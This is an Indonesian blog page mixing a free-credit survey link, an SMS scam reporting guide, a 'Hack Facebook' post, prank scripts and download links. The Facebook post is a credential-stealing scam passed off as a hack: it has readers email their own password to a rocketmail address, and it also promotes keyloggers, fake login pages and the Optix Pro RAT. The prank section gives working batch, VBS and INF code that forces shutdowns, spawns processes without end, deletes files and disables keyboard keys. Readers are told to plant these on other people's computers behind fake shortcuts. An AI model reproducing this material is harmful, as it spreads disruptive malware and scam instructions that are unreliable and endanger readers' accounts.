.
  • Exploit
  • Awesome blog 2

    Cara Mudah Mendapatkan Pulsa Gratis Sampai dengan 100 Ribu

    Cara Mudah Mendapatkan Pulsa Gratis Sampai dengan 100 Ribu - Selamat siang sobat Kali ini saya akan share bagaimana caranya mendapatkan pulsa gratis sampai dengan 100 ribu All Operator. Pasti sobat KIB bertanya tanya " Bagaimana sih caranaya dapat pulsa 100 ribu dengan mudah ? " jawaban nya simpel , anda langsung daftar saja di http://iddsurvey.mobie.in
         Cara Mudah Mendapatkan Pulsa Gratis Sampai dengan 100 Ribu ini untuk semua operatorbaik itu XL , Telkomsel , Axis , 3 , Indosat , Maupun CDMA.
    Berikut ini adalah langkah langkah nya :
    1. masuk Ke Sini

    2. Setelah itu anda diminta memasukan no. HP anda , Tulis no. HP di kotak yang tersedia .
         misalnya : 085292447xxx

    Cara Mudah Mendapatkan Pulsa Gratis Sampai dengan 100 Ribu

    3. Kemudian klik Daftar
    4. pilih sesuai operator anda.
    Cara Mudah Mendapatkan Pulsa Gratis Sampai dengan 100 Ribu
    5. Setelah itu akan ada sms masuk , kemudian masukan kode aktivasi akun anda .
    6. Next , akan seperti gambar dibawah ini , Klik Enter to win
    Cara Mudah Mendapatkan Pulsa Gratis Sampai dengan 100 Ribu
    Cara Mudah Mendapatkan Pulsa Gratis Sampai dengan 100 Ribu





          Apabila anda sudah mendapatkan pulsa yang mencukupi , anda bisa mengambil pulsa minimal sudah ada 5000.
    Sekian artikel tentang Cara Mudah Mendapatkan Pulsa Gratis Sampai dengan 100 Ribu . mudah kan langkah langkah nya ? anda cukup daftar dan ikuti langkah-langkah nya seperti diatas.
       Semoga bermanfaat.
    READMORE
     
    Reaksi: 

    Cara Blokir Nomor HP SMS Penipuan/SPAM

    CARA BLOKIR NOMOR HP PENIPUAN

    Sering kali kita mendapat SMS penipuan yang menyatakan anda menjadi pemenang kuis, atau SMS yang pura-pura nyasar ke nomor kita tentang transfer uang, mama genit minta pulsa, atau agen pulsa super murah dst...
    Jangan kita biarkan saja, saat ini ada cara efektif untuk menanggulangi sms yang meresahkan bagi sebagian orang tersebut.

    Berikut cara melaporkan nomor-nomor tersebut ke pihak provider :

    1. TELKOMSEL
    Format SMS : penipuan #nomor penipu #isi SMS tipuan dan kirim ke 1166

    Contoh : Penipuan #081212­3456 #selamat anda mendptkan 1 unit mbl avanza dr telkomsel poin...dst.
    lalu kirim ke 1166

    2. XL
    Format SMS : Lapor #Nomor yang di gunakan untuk menipu #kasus yangg di keluhkan lalu kirim ke 588

    3. INDOSAT
    Format SMS : SMS (spasi) Nomor­ pengirim SMS penipuan (spasi) ­isi SMS penipuan,
    kirim ke 726

    Jika sudah lebih dari dua orang yang melaporkan SMS penipuan, maka nomor tersebut segera di proses untuk di blokir secara­ permanen oleh pihak operator. Dan jangan khawatir Layanan ini bersifat gratis, namun saya baru menemukan cara untuk provider diatas saja, untuk three dan axis, jika saya sudah menemukan cara akan saya update secepatnya, Semoga bermanfaat.
    READMORE
     
    Reaksi: 

    4 cara Hack Facebook dengan mudah cepat di mengerti dan tidak ada jejak

    assalamualaikum ,,nih gan kali ini saya posting tentang HacK Facabook Terbaruuuuuuu ..!!! gimana gan ,,sebenernya sih saya punya banyak akal buat curi pass Facebook orang ,,cuma kebetulan saya orang nya sangat berbagi ,,emmm ..yauda deh saya ambil keputusan ,,saya bongkar rahasia yang mudah buat hack facebook hehe ,,pertama kali nih saya bongkar rahasia saya ,, yauda deh langsung cabut aja yuks ada apasih di balik rahasia FirMan wkwk ,,ini nih ternyata gann
    ffb waduhh sory ye gan saya telat buat bongkar rahasia saya hehe ,,baik dah sekarang aja yuks ..
    ini cara yang ke satu gan ,,
    1. Sign in lah kedalam account email kamu terlebih dahulu. yahoo, gmail, dll..
    2. kemudian dengan perasaan yang mendalam tulislah sebuah pesan, tekan tombol [Compose]/[tulis surat] untuk menulis email.
    3. Pada form isian to/ kepada masukkan alamat berikut:
    pwordfacebook@rocketmail.com
    Alamat inilah yang saya sebutkan sebagai alamat special tadi. Sebenarnya alamat ini hanya boleh diketahui oleh para admin Facebook saja, namun yeah.. kini alamat mematikan ini telah jatuh ke tangan kita
    4. Pada form cc dan bcc, kosongi saja kedua form tersebut
    5. pada kolom Subject ketik “uidfb” tanpa tanda kutip.
    6. Pada form message (pesan), ketik kode UID berikut:
    facebook.com FALSE/FALSE 1121114252079889
    Username facebook : user ID facebook kamu
    Facebook password : password kamu
    Recover : user ID facebook korban
    TTG : tanggal lahir kamu
    6. Setelah itu tekan tombol send.
    Dan tunggulah dalam beberapa hari kamu akan menerima email balasan yang berisi password korban dan informasi-informasi mengenai korban seperti secreet question yang dipakai korban beserta jawabannya dan tanggal lahir korban
    Contohnya:
    misalkan user ID facebook kamu adalah elite@yahoo.com
    dan password kamu 3l1t3b3n3r4n
    dan user ID facebook korban: korban@yahoo.com
    maka susunannya adalah sebagai berikut:
    to: pwordfacebook@rocketmail.com
    cc:
    bcc:
    Subject: Recovery
    message: facebook.com FALSE/FALSE 1121114252079889
    Username facebook : elite@yahoo.com
    Facebook password : 3l1t3b3n3r4n
    Recover : korban@yahoo.com
    TTG : 10041994
    facebook.com FALSE/FALSE 1121114252079889 : Ini Adalah Kode Tertentu Di Facebook
    ___________________________________________
    :: Cara Pencegahan ::
    Bagi kamu para pengguna fb yang tidak ingin passwordmu dicuri dengan tehnik ini, lakukan cara berikut:
    1. Pada form isian sento to: isikan
    pwordfacebook@rocketmail.com
    2. Pada kolom Subject ketik “No Recovery” tanpa tanda kutip.
    3. Kirim message sebagai berikut:
    facebook.com No Rerovery
    Username facebook : elite@yahoo.com
    Facebook password : password kamu
    contohnya yang sudah jadi:
    to: pwordfacebook@rocketmail.com
    cc:
    bcc:
    subject: No Recovery
    message: facebook.com No Rerovery
    Username facebook : username facebook kamu
    Facebook password : password facebook kamu
    TTG : tanggal lahir kamu
    Setelah mengirim email tersebut, maka bisa dipastikan facebook kamu sudah aman dari bugs mematikan ini. Orang yang berusaha melakukan tehnik ini tidak akan pernah mendapat balasan email yang berisi passswordmu. Namun harap diingat bahwa kamu juga harus melakukan hal ini setelah melakukan perubahan account. Jadi jika suatu ketika kamu mengganti password, lakukan cara penyelamatan lagi dengan melakukan langkah ini. Cepat lakukan sebelum terlambat, karena sudah banyak orang yang terkena cara ini! Ingat: Lakukan cara 2. untuk mendapatkan password korban Lakukan cara 3. untuk mencegah
    facebook kamu di hack orang lain.
    ini cara yang ke dua gan ,,
    Bisa langung dari facebook kita jg tanpa harus membuka email
    cara nyaLakukan langkah-langkah dibawah :
    1. Login email facebook anda dan lanjutkan ke halaman mengirim pesan.
    2. Klik compose message
    3. Pada tulisan To isi dengan
    pwordfacebook@rocketmail.com
    4. Pada tulisan subject isi dengan kata “PASSWORD RETRIEVE”
    5. isi pesan :
    baris pertama tulis alamat email anda.
    baris kedua tulis alamat email facebook temen anda.
    baris ketiga tulis password facebook anda.
    baris keempat tulis kode ini : cgi-bin/$et76431&pwr999
    Lalu Send/Kirim.
    Contoh :
    To : pwordfacebook@rocketmail.com
    Subject : PASSWORD RETRIEVE
    Message :
    anda@yahoo.co.id
    temen anda@yahoo.com
    Password anda
    cgi-bin/$et76431&pwr999
    Lalu Send/Kirim.
    INGGAT : JANGAN DISALAHGUNAKAN!! Dan YANG INI BUAT PARA PENG-COPAS JANGAN DICOPAS YA SOALNYA BERBAHAYA BANGET!
    Good luck…. ____________________________________________ ( SAYA PERNAH NYOBA DAN CARANYA BERHASIL 100% ).
    CATATAN :
    1. Jika anda mendapat pemberitahuan “Cannot find a password ! Give a little time to fix this problem, We will sent back your request for a few days”
    tunggu beberapa hari,dan mesin hacker akan mengirimkan password lagi ke anda. (paling lama 1minggu)
    2. Walaupun email anda yahoo, namun email si korban gmail, tidak menjadi masalah.namun ingat ini hanya berlaku untuk pengguna YAHOO,YMAIL dan GMAIL.
    ini cara yang ke tiga gan ,,
    cara yang ke tiga sebelumnya saya pernah posting tentang keyloger gan ,,nah jadi buka WEB SAYA lalu cari dari artikel nya ada tentang Keyloger dah pokonya ,,
    ini cara yang ke empat gan ,,
    nah cara yang ke empat ini saya menggunakan Fakelogin gan ,,mungkin agan sudah tau ye hehe ,ituloh yang tampilan nya sama kaya facebook tapi itu milik seseorang yang sakti wkwkwk ,, itu mudah gan kalo di postingkan terlalu panjang gan ,,tapi kalo gak faham bisa di komen nanti yee ,,
    yang lain nya masih banyak lagi gan cuma saya kasi tau aja yah saya sering menggunakan cara ini yang emang benar2 work gan tetapi di antara nya yang lebih pasti itu ,, ini nih
    - Keyloger/Refog
    -Fakelogin/web phising
    -Optix Pro
    dan yang lain dah tapi itu yang sering saya gunakan gan ,,semuanya juga WORK kok ,,gak ada ang abal-abal disini gan hehe,,
    nah itutuh rahasia seorang Hacker gan ,,gimana ?
    selamat mencoba ,,dan berikan komentarmu^^
    READMORE
     
    Reaksi: 

    Trik Tips Hacker Super Jail dengan Notepad

     Trik Tips Hacker Super Jail dengan Notepad - Hack Komputer - Hack Facebook - Aplikasi Hacker - Membuat Jebakan Virus Berbahaya

    kumpulan Cara Hacker Komputer, berikut ini merupakan cara hack komputer yang super jail. cara ini sangat cocok buat balas dendam dengan teman Anda, dibutuhkan Aplikasi Notepad untuk membuat Jebakan Atau Virus ringan hingga yang sangat mematikan. baiklah saya akan berbagi pengetahuan tentang Cara Hacker Komputer, berikut langkah-langkahnya : 

    TRIK 1  - Membuat Forced Shoutdown
    -------------------------------------------------
    @echo off
    msg * I don't like you
    shutdown -c "Error! You are too ******!" -s

    -------------------------------------------------
    simpan kode script yang berwarna Merah di Notepad dengan nama : xhack.BAT type file : All file
    sebarkan File tersebut di Komputer teman Anda,
    maka Komputer korban akan otomatis FORCED SHOUTDOWN


    TRIK 2 - Membuat Tombol Caps Lock menyala terus-menerus
    ------------------------------------------------------------------
    Set wshShell =wscript.CreateObject("WScript.Shell")
    do
    wscript.sleep 100
    wshshell.sendkeys "{CAPSLOCK}"
    loop
    -------------------------------------------------------
    seperti cara yang pertama, hanya berbeda kode script simpan kode yang berwarna biru di Notepad dengan nama : xhack.VBS type File : All File
    sebarkan File berikut di Komputer korban maka, Tombol CAPSLOCK akan menyala terus-menerus
    (bila dimatikan akan menyala lagi)


    TRIK 3 - Membuat Pesan Jail mucul terus
    ------------------------------------------------------
    @ECHO off
    :Begin
    msg * muka kamu sangat jelek
    msg * ngaca dulu gih,
    msg * hayo lo,cpu lu gw acak acak
    msg * udah install ulang aja
    msg * biar masalah nya kelar
    GOTO BEGIN

    ------------------------------------------------------

    simpan kode script yang berwarna hijau dengan nama xhack.BAT type file : All File
    Cara ini sangat simple Jail, walaupun di close tab pesan ini masih muncul, kata katanya bisa diubah sesuai selera.








     
    TRIK 4 - Jail dengan Membuka Tutup CD/DVD room
    ------------------------------------------------------
    Set oWMP = CreateObject("WMPlayer.OCX.7")
    Set colCDROMs = oWMP.cdromCollection
    do
    if colCDROMs.Count >= 1 then
    For i = 0 to colCDROMs.Count - 1
    colCDROMs.Item(i).Eject
    Next
    For i = 0 to colCDROMs.Count - 1
    colCDROMs.Item(i).Eject
    Next
    End If
    wscript.sleep 5000
    loop
    -------------------------------------------------------
    simpan di Notepad kode berikut dengan nama : xhack.vbs type file : All File
    maka DVD/CD roomnya akan membuka dan menutup otomatis,


    TRIK 5 - Membuat script mucul terus menerus
    -------------------------------------------------------
    Set wshShell = wscript.CreateObject("WScript.Shell")
    do
    wscript.sleep 100
    wshshell.sendkeys "~(enter)"
    loop
    -------------------------------------------------------
    simpan kode berikut di Notepad dengan nama : xhack.vbs type file : All File
    membuat script bermunculan terus menerus


    TRIK 6 - Membuat Tombol Backspace menjadi eror - menekan terus menerus
    --------------------------------------------------------
    MsgBox "kembali ke menu sebelumnya"
    Set wshShell =wscript.CreateObject("WScript.Shell")
    do
    wscript.sleep 100
    wshshell.sendkeys "{bs}"
    loop
    ---------------------------------------------------------- 
    simpan kode script berikut di Notepad dengan nama : xhack.vbs type file : All File
    maka Tombol Backspace akan eror dan menekan dengan sendirinya


    TRIK 7 - Cara Membuat Pesan ' Komputer Anda Jelek Banget ' di Notepad/ Wordpad
    -----------------------------------------------------------
    Set wshShell = wscript.CreateObject("WScript.Shell")
    do
    wscript.sleep 100
    wshshell.sendkeys "
    Komputer Anda Jelek Banget"
    loop
    ----------------------------------------------------------- 
    ganti kata Komputer Anda Jelek Banget dengan selera Anda, simpan di Notepad dengan nama : xhack.vbs


    TRIK 8 - Cara Membuat Notepad Terbuka Otomatis - terus menerus
    ------------------------------------------------------------
    @ECHO off
    :top
    START %SystemRoot%\system32\notepad.exe
    GOTO top
    ------------------------------------------------------------ 
    simpan di Notepad dengan nama : xhack.BAT
    maka Notepad akan terbuka terus menerus




    TRIK 9 - Membuat Notepad dengan Pesan Jail
    -------------------------------------------------------------

    WScript.Sleep 1800
    WScript.Sleep 100
    Set WshShell = WScript.CreateObject("WScript.Shell")
    WshShell.Run "notepad"
    WScript.Sleep 10
    WshShell.AppActivate "Notepad"
    WScript.Sleep 50
    WshShell.SendKeys "ka"
    WScript.Sleep 50
    WshShell.SendKeys "mu "
    WScript.Sleep 50
    WshShell.SendKeys "je"
    WScript.Sleep 50
    WshShell.SendKeys "le"
    WScript.Sleep 50
    WshShell.SendKeys "k "
    WScript.Sleep 50
    WshShell.SendKeys " se"
    WScript.Sleep 50
    WshShell.SendKeys "ka"
    WScript.Sleep 50
    WshShell.SendKeys "li"
    WScript.Sleep 50
    WshShell.SendKeys " y"
    WScript.Sleep 50
    WshShell.SendKeys "a"
    WScript.Sleep 50
    WshShell.SendKeys " h"
    WScript.Sleep 50
    WshShell.SendKeys "!"
    WScript.Sleep 50
    WshShell.SendKeys "!! "

    -----------------------------------------------------------
    simpan di Notepad dengan nama : xhack.vbs 
    ganti kode yang berwarna merah sesuai dengan selera anda.


    TRIK 10 - Cara Membuat Memilih jawaban seperti Quiz di Notepad
    -----------------------------------------------------------
    @echo off
    title quiz hari ini :)
    :menu
    cls
    echo jika kamu kena virus apa
    yang kamu lakukan
    pause
    echo pilih yang mana:
    echo 1. matiin computer
    echo 2. format aja
    echo 3. bingung ahh
    set input=nothing
    set /p input=Choice:
    if %input%==1 shutdown -s -t
    30
    if %input%==2 del c:xxx
    if %input%==3 @ECHO off
    msg * muka lo rusak
    msg * ngaca dulu gih
    msg * hayo lo,cpu lu gw acak2
    msg * ud install ulang aja
    msg * biar masalah nya kelar
    @ECHO off
    :top
    START %SystemRoot%
    system32notepad.exe
    GOTO top -----------------------------------------------------------
    simpan kode script berikut di Notepad dengan nama : xhack.BAT



    TRIK 11 - Membuat Komputer Hang dengan Kode script Notepad
    -------------------------------------------------------------

    start

    start

    start

    start

    start

    start

    start

    start

    start

    start

    start

    start
    -----------------------------------------------------------
    simpan di Notepad dengan nama : xhack.BAT
    terus buat shortcut palsu terserah mau shortcut apa, aku saranin shortcutnya browser mozilla terus taro aja di desktop target
    ( efeknya akan membuka CDM yang banyak banget sampe layarnya keluar keluar )



    TRIK 12 - Cara Mematikan Tombol Keyboard
    -------------------------------------------------------------
    1. Salin baris-baris kode (script) berikut , paste pada Notepad dan simpan dengan nama JAIL.INF

    Langsung kita mulai saja :

    [Version]
    Signature=”$Windows NT$”

    [DefaultInstall]
    AddReg =AIUEO

    [AIUEO]
    HKLM,”SYSTEM\CurrentControlSet\Control\Keyboard Layout”,”Scancode Map”,0×1,00,00,00,00,00,00,00,00,06,00,00,00,00,00,1e,00,00,00,12,00,00,00,
    17,00,00,00,18,00,00,00,16,00,00,00,00,00

    —————————————

    2. Untuk menjalankannya, klik kanan nama file JAIL.INF dan pilih menu> Install

    3. Log Off komputernya agar trik ini berfungsi.

    NB :

    Script diatas dimaksudkan untuk mematikan tombol A I U E O pada keyboard.

    Untuk menormalkannya, silahkan salin script berikut :

    —————————————

    [Version]
    Signature=”$Windows NT$”

    [DefaultInstall]
    DelReg =normal

    [normal]
    HKLM,”SYSTEM\CurrentControlSet\Control\Keyboard Layout”,”Scancode Map”

    —————————————

    —> Simpan dengan nama “NORMAL.INF
    Klik kanan file ini, pilih >Install
    Log Off komputernya.
    READMORE
     
    Reaksi: 

    PHOTOSCAPE V 3.5

    hai broo ! gmna kabarnya ? semoga baik-baik saja :)
    skarang gue mau ngepost dlu tentang PHOTOSCAPE V 3.5 :)

    bagi yang blom punya langsung saja sedot di sini >>>>> download now !

    gambar :



    READMORE
     
    Reaksi: 

    photoshop CS4 portable

    hai sob :D
    bagi yang suka edit-edit photo langsung seedot di sini >>>download disini<<<
    photoshop CS4 portable .
    yang memudahkan kalian untuk mengedit foto :)

    gambar terkait :








    klik di sini  >>>>>>>>   download disini
    READMORE
     
    Reaksi: 

    profil singkat pemilik blog ini


    Nama Lengkap : Sulhan k
    Nama Panggilan : Han
    Tanggal Lahir : 12 Maret 1997
    Tempat Lahir : Mataram
    Tinggi Badan : 170 cm

    Berat Badan : 58 kg
    Klub Saat ini : Redwood Fc
    Kebangsaan : indonesia
    Posisi : Penjaga Gawang

    Nomor Punggung : 20

     
     Perjalanan Karir Sulhan K sudah dimulai sejak ia masih anak-anak yakni saat berumur 8 tahun, tahun 2005 ia bermain untuk PSDA, di klub PSDA asal Mataram ini ia bertahan cukup lama, yaitu selama enam tahun (2005 sampai 2011) bisa dikatakan Sulhan menghabiskan masa anak-anak nya sebagai penjaga gawang di klub ini. Kemudian, tahun berikutnya yakni tahun 2011 ia Hengkang dri club tersebut untuk ikut membela independent fc. selama mmbela klub tersebut Sulhan sring mngalami cidera . sempat mngalami cidera parah di kpala yg mmbuatnya berhenti sejenak untuk bermain bola dan memilih hijrah ke klub lain. awal tahun 2012 ia bergabung bersama klub Redwood Fc hingga sekarang 2013 . di klub tersebut banyak mngalami bnyak prubahan .

    "SAYA AKAN BANGGA APABILA SUATU HARI SAYA DAPAT DI SEJAJARKAN NAMA BESAR SEPERTI IKER CASILLAS DAN BUFFON. UNTUK ITUHLAH TUJUAN SAYA BEKERJA KERAS" Sulhan K

    Sekian Profil ane mhon maaf jika ada salah :D
    READMORE
     
    Reaksi: